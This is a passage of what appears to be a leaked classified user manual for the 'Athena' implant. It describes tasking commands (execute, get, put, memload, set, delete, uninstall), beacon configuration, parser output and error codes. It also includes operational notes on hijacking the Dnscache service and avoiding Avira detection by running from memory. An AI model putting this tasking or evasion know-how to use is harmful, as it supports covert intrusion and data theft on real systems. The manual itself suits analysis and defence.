SECRET//NOFORN 27 SECRET//NOFORN ________________________________________________________________________ 8.3 (U) User Interface (S//NF) The Tasker shell interface allows for an interactive processing mode. There are two input options. By simply selecting a management feature or command feature and pressing enter, a wizard interface will be presented to select all required options for the feature. Alternatively, for more advanced users, a command line option with tab-complete can be used to process commands on a single line. The formatting of the command features is identical to the script output format. Management Features ============================================================ receipt generate ls rm import id help Command Features ============================================================ execute get put memload memunload set delete uninstall Exit Commands: ============================================================ bye exit Welcome to the Athena Tasker shell. Type help or ? to list commands. Figure 17 - (S//NF) Tasker Main Menu 8.3.1 (U) Management Features (S//NF) The Tasker Management Features provide control of the batch file created to task a specific implant. The receipt defines the Parent ID of the target to process. Each command set is known as a batch. Each batch file contains a unique Batch ID. 8.3.1.1 (U) Receipt (S//NF) This command updates the target reference by loading the receipt.xml file defined for the target. Usage: receipt Example: receipt builder_output\test_ABCD0064\test_ABCD0064.receipt.xml Output: New Receipt Loaded: Receipt File: builder_output\test_ABCD0064\test_ABCD0064.receipt.xml Parent ID: test 8.3.1.2 (U) Generate (S//NF) This command will generate an encrypted batch file ready for deployment on the Listening Post. This command has additional options: • Priority (number 0..255): 0-highest, 255-lowest – priority for the server to process batch • Persist (bool): true-do not delete, false-delete once sent – force a file to always be run SECRET//NOFORN 28 SECRET//NOFORN ________________________________________________________________________ o during a beacon cycle. This has lower priority than other batch commands o waiting for processing. • Stop On Error (bool): true-do not continue processing batch on command failure o false-continue processing all batch command irrelevant of error status • Output Path: location where the batch information is stored (default: .\tasker_output) Usage: generate priority=128 persist=false stoponerror=false output=.\tasker\output Example: generate [generate] - output binary batch file for a specific target Description: prioritize this batch request on LP (0-high, 255-low) Default: 128 priority (number 0..255): Description: persist this batch on LP - do not delete after transfer Default: False persist (bool): Description: Stop executing this batch on a command error Default: False stoponerror (bool): Description: specific path to store batch (binary file and script) Default: tasker_output output path (string): PATH: d:\Development\Athena\console\tasker\tasker_output\test RSA encrypting header with client public key BINARY: __128_test_ABCD0064_63A95A3C SCRIPT: __128_test_ABCD0064_63A95A3C_script.txt BATCH: 63A95A3C 0: execute pre=0 post=0 filename="ipconfig" arguments="/all" 1: uninstall pre=0 New Batch ID=0x8E9F251C Output: New Receipt Loaded: SECRET//NOFORN 29 SECRET//NOFORN ________________________________________________________________________ Receipt File: builder_output\test_ABCD0064\test_ABCD0064.receipt.xml Parent ID: test 8.3.1.3 (U) LS (S//NF) This command will list the batch id and all commands defined for this batch. They are numbered from zero and can be referenced by this index. Usage: ls Example: ls Output: BATCH: DAD72903 0: execute pre=0 post=0 filename="ipconfig" arguments="/all" 1: uninstall pre=0 8.3.1.4 (U) RM (S//NF) This command will remove a command from the current batch. Each command is reference by a zero based index. These indexes can be viewed by using the LS command as shown above. The remove command will remove a single command from a batch. Usage: rm Example: rm 1 Output: REMOVED: uninstall pre=0 8.3.1.5 (U) Import (S//NF) This command will import commands from generated script. Script files are text files with a .txt extension. This command incorporates external scripts into the current script. The output will display the command that were imported. Use the LS command to view the complete list. Usage: import Example: import tasker_output\test\__128_test_ABCD0064_DAD72903_script.txt Output: New Script Loaded: tasker\tasker_output\test\__128_test_ABCD0064_DAD72903 _script.txt COMMAND: uninstall pre=0 8.3.1.6 (U) ID (S//NF) The ID command is used to force a specific batch ID for the Tasker to generate. This command is generally used for debug purposes only. Usage: id SECRET//NOFORN 30 SECRET//NOFORN ________________________________________________________________________ Example: id 12345678 Output: New Batch ID=0x12345678 8.3.1.7 (U) Help (S//NF) The Help command displays the Tasker Shell Interface Help as shown in Figure 9 (above). Each command has extensive help and can be displayed by request help . Usage: help 8.3.2 (U) Command Features (U) NOTE: System environment strings will be expanded at runtime (e.g. %SYSTEMROOT%). 8.3.2.1 (U) Execute (S//NF) This command will import commands from generated script. Script files are text files with a .txt extension. This command incorporates external scripts into the current script. The output will display the commands that were imported. Use the LS command to view the complete list. Usage: execute pre= post= filename= arguments= Example: execute [execute] - execute a command on target Description: amount of time prior to command processing (0-default) pre-delay (number): Description: amount of time after command processing completes (0-default) post-delay (number): Description: 0=foreground(sync) 1=background(async) task (0-default) task (number 0-foreground, 1-background): Description: specific application name on target to execute filename (string):ipconfig Description: specific arguments used with this command arguments (string):/all Output: COMMAND: execute pre=0 post=0 task=0 filename="ipconfig" arguments="/all" 8.3.2.2 (U) Get (S//NF) This command will retrieve a file from the target. Usage: get flag= filename= Example: get [get] - download a file from the target Description: prioritize this get request flag (bool): (not currently used) Description: specific file to retrieve filename (string):c:\temp\myfile.txt SECRET//NOFORN 31 SECRET//NOFORN ________________________________________________________________________ Output: COMMAND: get flag=0 filename="c:\temp\myfile.txt" 8.3.2.3 (U) Put (S//NF) This command will send a file to the target. The local file must be present during the generate command. The request will also fail if the directory does not exist on the target. Usage: put remote_filename= local_filename= Example: put [put] - upload a file to the target Description: local filename to use local_filename (string):c:\temp\myfile.txt Description: remote filename on target remote_filename (string):c:\windows\system32\a.txt Output: COMMAND: put remote_filename="c:\windows\system32\a.txt" local_filename= "c:\temp\myfile.txt” 8.3.2.4 (U) Memload (S//NF) This command will load a DLL onto the target in the same address space as the target service. The nickname option can be used to reference this specific DLL for unload. Warning (S//NF) The nickname is case sensitive. Usage: memload pre=0 post=0 nickname= filename= Example: memload [memload] - load a DLL onto the target Description: amount of time prior to command processing (0-default) pre-delay (number): Description: amount of time after command processing completes (0-default) post-delay (number): Description: a unique name used for this module nickname (string):mymodule Description: specific DLL module to load on target filename (string):c:\temp\magic.dll Output: COMMAND: memload pre=0 post=0 nickname="mymodule" filename="c:\temp\magic.dll" SECRET//NOFORN 32 SECRET//NOFORN ________________________________________________________________________ 8.3.2.5 (U) Memunload (S//NF) This command will unload a loaded module based on the nickname provided in the memload command. WARNING: The nickname is case sensitive. Usage: memunload pre=0 nickname= Example: [memunload] - unload a DLL already loaded on target Description: amount of time prior to command processing (0-default) pre-delay (number): Description: specific nickname used during memload nickname (string):mymodule Output: COMMAND: memunload pre=0 nickname="mymodule" 8.3.2.6 (U) Set (S//NF) This command will update a specific configuration option. The following list shows all the configuration options available via this command. interval={number} - beacon interval jitter={percent} - beacon jitter in percentage bootdelay={number} - amount of time to wait at each boot hibernationdelay={number} - amount of time to wait after install taskingdelay={number} - amount of time to wait before tasking domains={string} - IP or URL of listening post port={port} - port number of listening post proxyport={port} - port number of proxy proxyaddress={ipaddress} - port address of proxy useragentstring={string} - user agent string sent with command urlpath={string} - url path for tasking acceptstring={string} - accept string acceptlangstring={string} - accept language string acceptencodingstring={string} - accept encoding string ieproxyaddress={string} - IE proxy address string wpadproxyaddress={string} - WPAd proxy address string statefilepath={string} - state information processing path batchexecutiontimeout={number} - max amount of time per batch commandexecutiontimeout={number} - max amount of tie per command maxchunksize={number} - max amount of bytes to process per send maxcpuutilization={percent} - max cpu utilization during processing maxprocessingdatasize={number} - max data size uninstalldate={date(YYYY-MM-DDTHH:MM:SS)} - time to uninstall deadmandelay={number} - maximum time to wait for successful beacon beaconfailures={number} - maximum number of beacons before uninstall killfilepath={string} - location of kill file safety={number} - any number - this will perform a no-operation (NOOP) Usage: set pre=0 post=0 = Example: [set] - update a specific configuration setting on target Description: amount of time prior to command processing (0-default) pre-delay (number): Description: amount of time after command processing completes (0-default) post-delay (number): SECRET//NOFORN 33 SECRET//NOFORN ________________________________________________________________________ Description: specific name of configuration name:interval Description: specific value for the configuration value (number):20000 Output: COMMAND: set pre=0 post=0 interval=20000 8.3.2.7 (U) Delete (S//NF) This command will securely delete a file on the target systems. Usage: delete Example: [delete] - securely delete a file on the target Description: filename to use filename (string):c:\temp\magic.dll Output: COMMAND: delete filename="c:\temp\magic.dll" 8.3.2.8 (U) Uninstall (S//NF) This command will uninstall the target from the remote system. Usage: uninstall Example: uninstall [uninstall] - uninstall tool from target Description: amount of time prior to command processing (0-default) pre-delay (number): Output: COMMAND: uninstall pre=0 8.4 (U) User Interface Example (S//NF) Example: (Athena) >python.exe tasker.py Management Features ============================================================ receipt generate ls rm import id help Command Features ============================================================ execute get put memload memunload set delete uninstall Exit Commands: ============================================================ bye exit Welcome to the Tasker shell. Type help or ? to list commands. SECRET//NOFORN 34 SECRET//NOFORN ________________________________________________________________________ tasker::no receipt>receipt builder_output\e0Eo\receipt.xml New Receipt Loaded: Receipt File: builder_output\e0Eo\receipt.xml Parent ID: e0Eo tasker::e0Eo>execute [execute] - execute a command on target Description: amount of time prior to command processing (0-default) pre-delay (number): Description: amount of time after command processing completes (0-default) post-delay (number): Description: specific application name on target to execute filename (string):ipconfig Description: specific arguments used with this command arguments (string):/all COMMAND: execute pre=0 post=0 filename="ipconfig" arguments="/all" Figure 18 - (S//NF) Tasker Shell Interface Example – Part 1 OR >python.exe tasker.py Management Features ============================================================ receipt generate ls rm import id help Command Features ============================================================ execute get put memload memunload set delete uninstall Exit Commands: ============================================================ bye exit Welcome to the Tasker shell. Type help or ? to list commands. tasker::e0Eo>execute pre=0 post=0 filename=ipconfig arguments=/all COMMAND: execute pre=0 post=0 filename="ipconfig" arguments="/all" tasker::e0Eo>generate [generate] - output binary batch file for a specific target Description: prioritize this batch request on LP (0-low, 255-high) Default: 128 priority (number 0..255): Description: persist this batch on LP - do not delete after transfer Default: False persist (bool): Description: Stop executing this batch on a command error Default: False stoponerror (bool): Description: specific path to store batch (binary file and script) Default: tasker_output output path (string): PATH: d:\Development\Athena\athena_suite\tasker_output\e0Eo RSA encrypting header with client public key BINARY: __128_e0Eo_1111 SCRIPT: __128_e0Eo_1111_script.txt BATCH: 00001111 0: execute pre=0 post=0 filename="ipconfig" arguments="/all" Figure 19 - (S//NF) Tasker Shell Interface Example – Part 2 SECRET//NOFORN 35 SECRET//NOFORN ________________________________________________________________________ 8.5 (U) Output (S//NF) The Tasker produces a binary file (no extension) and a text file (.txt). The binary file will be copied to the Listening Post for downloading to the target. The text file is an unencrypted textual reference of the commands within the specific batch file which can be used as an historical reference or as an input to the Tasker to generate a duplicate batch. 8.5.1 (U) Binary-Based Output File (S//NF) Sample output: __128_test_ABCD0064_12345678 (S//NF) The binary file is an encrypted block that can only be decrypted by the target. The Listening Post cannot decode the content of this file. To allow the Listening Post some knowledge about the file’s content and priority, the filename is encoded as described below: Table 9 – (U) Command File Encoding Filename Component Value Position 0 Description _ The underbar shows that this is a standard batch file (e.g. __128). + The plus sign tells the server that this file is persistent and the server will not delete it after processing (e.g. +_128). Priority number This number represents the priority. 0-highest and 255-lowest (NOTE: 128-default) Parent string This string represents the target parent ID. This name must match the parent ID reference in the directory. Child hex This string representation of hex is the target child ID. This name must match the child ID reference in the directory. Batch hex This string representation of hex is the batch ID. This is a random number which prevents duplicate batches. 8.5.2 (U) Text-Based Output File (S//NF) Sample output: __128_test_ABCD0064_12345678_script.txt (S//NF) The text file contains the textual representation of the command. This content is stored in the text file as UTF-8. The file name is the same as the corresponding binary file with the _script.txt extension. # ATHENA SCRIPT execute pre=0 post=0 task=0 filename="ipconfig" arguments="/all" 9. (U) Parser (S//NF) Some general usage comments are presented below: • Any default value (e.g., [bracketed text]) is either randomly generated or a suggestion, and their use on multiple operations without modification may present a signature that could identify the presence of Athena in a network. SECRET//NOFORN 36 SECRET//NOFORN • • ________________________________________________________________________ The word 'overt' in a prompt for configuration information indicates the information will be visible to a user logged on to the target machine. Care should be taken to ensure these values are consistent with the operational CONOP. Configuration settings that can be modified when the implant is on target are indicated in the prompt text. 9.1 (U) Usage (S//NF) This section contains information for parsing encrypted data from an implant. Figure 20 shows the command line options for the Parser. Warning (S//NF) Implant parsing may be completed on the low-side; however, the operator should be aware that cryptographic key data will be in the clear. (S//NF) By default, the Parser will use the local directory for input and output directory locations. A single receipt file or directory of receipt files can be included as a command line option. By default, the builder_output\receipts directory will be used to process receipts built with the Builder. Parser Tool usage: parser.py [-h] [-r RECEIPT] [-i INPUT] [-d] [-o OUTPUT] [-m] Parser Configuration optional arguments: -h, --help show this help message and exit -r RECEIPT, --receipt RECEIPT This argument defines an existing receipt filename or directory of receipts to be used for processing. -i INPUT, --input INPUT This argument provides the ability to import a file or directory of files. -d, --debug Enable decoding of unencrypted files from target -o OUTPUT, --output OUTPUT This argument provides the output path location. -m, --nomark This argument provides the ability to reuse a processed directory. By default, the parsing code will mark processed files with a date prefix. (e.g. 20150908_1010_{30996559-C169-490B-A40B-4ADB597E0D19}. Figure 20 - (S//NF) Parser Command Line Options 9.2 (U) Command Line Options 9.2.1 (U) RECEIPT (S//NF) This argument defines an existing receipt filename to be used for processing. This is the file name with full path to the receipt file generated by the Builder. SECRET//NOFORN 37 SECRET//NOFORN ________________________________________________________________________ 9.2.2 (U) INPUT (S//NF) This argument provides the ability to import a file or directory of files into the Parser. By default, the Parser will search the parser_input directory for files that are not marked. 9.2.3 (U) OUTPUT (S//NF) This argument provides the output path location. By default, the Parser will place the output results in the parser_output directory. 9.2.4 (U) NOMARK (S//NF) This argument provides the ability to reuse a processed directory. By default, the parsing code will mark processed files with a date prefix. (e.g. 20150908_1010_30996559) 9.3 (U) Processing Responses and Safeties (S//NF) The Parser will process all the output files from the Listening Post. By default, the Listening Post will store the response file as _ _ . Example: test_ABCD0064_20151221_18_55_28_4091 (S//NF) Once the Parser processes the file, it will preface the filename with the parsing date. Example: [20151221_18_59_26_6964]_test_ABCD0064_20151221_18_55_28_4091 (S//NF) This strategy will allow processed files to remain in the parser_input directory without slowing down processing of newly added response files. Note (S//NF) To simplify processing, place newly uploaded responses and safeties in the parser_input directory. 9.4 (U) Output (S//NF) The Parser produces a text file containing the command and results of each response. 9.4.1 (U) Get (S//NF) The Get command will also store a file with the same name as the results text file that contains the content of the file retrieved: Batch ID = 0x11111111 Command ID = 0x00000000 Command Type = get Command Status = 0x00000000 Error Code = 0x00000000 Persist = False Stop On Error = False Parent ID = test Target ID = ABCD0086 Time = Mon Dec 21 22:08:47 2015 GMT Filename = GET.TXT Attributes = ARCHIVE SECRET//NOFORN 38 SECRET//NOFORN ________________________________________________________________________ Modify Time: Mon Dec 21 22:08:02 2015 GMT Create Time: Mon Dec 21 22:08:02 2015 GMT File Size: 18 bytes Output Filename: d:\Development\Athena\Tests\TestCommandEngine\parser_output\test\ABCD0086\responses\20 151221_17_10_01_0375_get.bin 9.4.2 (U) Put (S//NF) An example of the Parser output from a successful Put command is shown below: Batch ID = 0x22222222 Command ID = 0x00000000 Command Type = put Command Status = 0x00000000 Error Code = 0x00000000 Persist = False Stop On Error = False Parent ID = test Target ID = ABCD0086 Time = Mon Dec 21 22:08:52 2015 GMT Filename = d:\Development\Athena\Tests\TestCommandEngine\win32\debug\put.txt 9.4.3 (U) Set (S//NF) The SET command can return an error for the following reasons. The return code will be ARESULT_DISK_ERROR(0xA0000104). The parser.py code has been changed to detect this error code and change the output to “DATA NOT PERSISTED”. The dynamic data storage will update the data in memory but will not be available at next reboot. 1) If the implant is running in ram-only mode, the attempt to write to disk will return an error. 2) If the implant is configured with an invalid dyn_config file, the attempt to write to the file will return an error. Output: Error Code = DATA NOT PERSISTED (S//NF) An example of the Parser output from a successful Set command is shown below: Batch ID = 0x33333333 Command ID = 0x00000000 Command Type = set Command Status = 0x00000000 Error Code = 0x00000000 Persist = False Stop On Error = False Parent ID = test Target ID = ABCD0086 Time = Mon Dec 21 22:08:58 2015 GMT Set Type = killfilepath Argument = c:\temp\kill SECRET//NOFORN 39 SECRET//NOFORN ________________________________________________________________________ 9.4.4 (U) Memload (S//NF) An example of the Parser output from a successful Memload command is shown below: Batch ID = 0x55555555 Command ID = 0x00000000 Command Type = memload Command Status = 0x00000000 Error Code = 0x00000000 Persist = False Stop On Error = False Parent ID = test Target ID = ABCD0086 Time = Mon Dec 21 22:09:07 2015 GMT Memory Address = 0x10000000 Nickname = testdll nickname 9.4.5 (U) Memunload (S//NF) An example of the Parser output from a successful Memunload command is shown below: Batch ID = 0x66666666 Command ID = 0x00000000 Command Type = memunload Command Status = 0x00000000 Error Code = 0x00000000 Persist = False Stop On Error = False Parent ID = test Target ID = ABCD0086 Time = Mon Dec 21 22:09:12 2015 GMT Memory Address = 0x10000000 Nickname = testdll nickname 9.4.6 (U) Delete (S//NF) An example of the Parser output from a successful Delete command is shown below: Batch ID = 0x77777777 Command ID = 0x00000000 Command Type = delete Command Status = 0x00000000 Error Code = 0x00000000 Persist = False Stop On Error = False Parent ID = test Target ID = ABCD0086 Time = Mon Dec 21 22:09:17 2015 GMT Filename = d:\Development\Athena\Tests\TestCommandEngine\win32\debug\deleteme.txt 9.4.7 (U) Execute (S//NF) An example of the Parser output from a successful Execute command is shown below: SECRET//NOFORN 40 SECRET//NOFORN ________________________________________________________________________ Batch ID = 0x44444444 Command ID = 0x00000001 Command Type = execute Command Status = 0x00000000 Error Code = 0x00000000 Persist = False Stop On Error = False Parent ID = test Target ID = ABCD0086 Time = Mon Dec 21 22:09:02 2015 GMT Filename = %systemroot%\system32\net.exe Process Return Code = 0x00000000 < > New connections will be remembered. Status Local Remote Network ------------------------------------------------------------------------------Unavailable Z: \\10.3.2.91\Athena Microsoft Windows Network The command completed successfully. 9.4.8 (U) Uninstall (S//NF) An example of the Parser output from a successful Uninstall command is shown below: Batch ID = 0x99999999 Command ID = 0x00000000 Command Type = uninstall Command Status = 0x00000000 Error Code = 0x00000000 Persist = False Stop On Error = False Parent ID = test Target ID = ABCD0086 Time = Mon Dec 21 23:50:00 2015 GMT 9.5 (S//NF) Error Codes (S//NF) The implant contains some defined error codes. It is possible to receive standard windows error codes but most errors are defined at -1(0xFFFFFFFF). The following table has the defined error codes that can be returned from the implant. Table 10 - (U) Error Codes Error Description 0 0xA0000001 0xA0000002 0xA0000003 0xA0000004 0xA0000005 0xA0000006 0xA0000007 0xA0000008 0xA0000101 Success Invalid PE Header Initialization Failure – target DLL Teardown Failure – target DLL Relocation Failure – target DLL DLL Name Allocation Failure Forwarder Entry Allocation Failure Forwarder Buffer Overflow Duplicate Entry Timeout SECRET//NOFORN 41 SECRET//NOFORN ________________________________________________________________________ 0xA0000102 0xA0000103 0xA0000104 Size too big Out of memory Disk Error – invalid disk name or ram only 10.(U) Notes and Observations 10.1 (U) Installations of Hera Require a Reboot for Elevated Access Privileges (S//NF) Hera hijacks the Dnscache service on installation. On Windows 7 and 8, this service is running in a netsvcs instance by default but on Windows 8.1 and Windows 10, this service runs as NetworkService. The NetworkService user context has reduced security capability on the system. Due to the srvhost implementation, the service will only run in the netsvcs context after the next reboot. To account for this deficiency and still provide immediate execution after installation, the existing service will run as NetworkService (not SYSTEM) until next reboot at which time the System user netsvcs will be engaged. As a result, until a reboot occurs, some attempts to access files may fail, causing the command to be reported as an error. 10.2 (U) Installer and RAM_ONLY Versions Should Never Be Run From Disk (S//NF) Copying the Installer or the RAM_ONLY version of the implant to the target computer and then executing either application from disk will generate an alert when Avira is the PSP. Avira flags the size of the data section as being too large and thus possibly malware. Avira does not flag the size of the implant data section when these applications are run from memory as intended. 10.3 (U) Builder Does Not Produce a “Bit Copy” of an Existing Configured Implant (S//NF) The Builder can ingest a configuration file from an existing implant and copy the configuration settings to a new implant. However, the new implant will not be a bit by bit exact copy of the original implant. Making an exact copy of an existing implant is not possible due to the design of the implant and the desire to ensure entropy in between instances of the tool. Only way to reproduce a bit copy of an existing implant would be to have a large section of zero byte data in the configured implant which would be an easy way to correlate instances of the tool. 10.4 (U) Offline Installer May Report a False Failure on Windows 10 Installations (S//NF) The Offline Installer may display an error message stating the following key is not found: Reg: SYSTEM\CurrentControlSet\Services\SstpSvc Start -> 0x02 Type -> 0x20 (U) If the result of the installation process is a SUCCESS, the Key Not Found error should be ignored. 10.5 (S//NF)Timeouts May Occur While Processing Large Files (S//NF) If the Operator selects a very small chunk size (e.g., 2048 bytes) and a short duration for either the command execution or batch execution timeout, the implant may not have enough time SECRET//NOFORN 42 SECRET//NOFORN ________________________________________________________________________ to complete transferring the entire file to the LP before the duration timer expires when the file is very large. Care should be taken to select values consistent with the operational environment when configuring the chunk size (maximum number of bytes in a single block), command execution timeout (terminates processing of long running commands), and batch execution timeout (terminates processing of long running batches). A good operational practice would be to assign reasonable values for these settings early in the batch when a large file is being retrieved. 11. (U) Acronyms / Abbreviations (U) The acronyms and abbreviations used in this document are shown in Table 11. Table 11 - (U) Acronyms and Abbreviations Acronym Description AXE Athena Executable File CNE Computer Network Exploitation CONOP Concept of Operation DLL Dynamic Link Library DNS Domain Name Server GB Gigabyte KB Kilobyte KIS Kaspersky Internet Security LP Listening Post OS Operating System PE Portable Executable PSP Personal Security Product RAM Random Access Memory SSL Secure Sockets Layer UI User Interface UM User Manual VM Virtual Machine SECRET//NOFORN 43
Source Exif Data:
File Type : PDF File Type Extension : pdf MIME Type : application/pdf PDF Version : 1.3 Linearized : No Page Count : 49EXIF Metadata provided by EXIF.tools